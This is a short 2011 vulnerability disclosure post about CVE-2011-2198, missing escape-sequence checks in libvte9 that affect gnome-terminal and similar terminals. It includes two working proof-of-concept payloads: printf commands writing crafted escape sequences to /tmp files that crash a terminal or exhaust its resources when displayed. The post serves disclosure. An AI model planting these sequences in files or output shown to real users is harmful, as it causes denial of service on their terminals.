libvte9: Escape sequences of death (CVE-2011-2198)

Thu, 16 Jun 2011 20:14:29 +0200
Tags: security

While playing with terminals, I discovered several missing checks in the way that libvte9.so handles escape sequences. This library is used by a lot of terminal emulators such as gnome-terminal, lxterminal and xfce4-terminal. A good exploitation of those vulnerabilities can lead to a crash of the terminal emulator or an excessive memory and CPU consumption.

DoS using the "insert-blank-characters" capability (reported as bug BUG#629688):

$ printf "\033[100000000000000000@" > /tmp/ic-file_of_death
$ cat /tmp/ic-file_of_death

DoS using the "window-manipulation" capability (not reported yet):

$ printf "\033[10000t\n\033[100000t" > /tmp/wm-file_of_death
$ cat /tmp/wm-file_of_death

This has been tested on Debian 6.0.1, kernel 2.6.32-5-amd64, libvte9 version 1:0.24.3-2 and gnome-terminal version 2.30.2-1.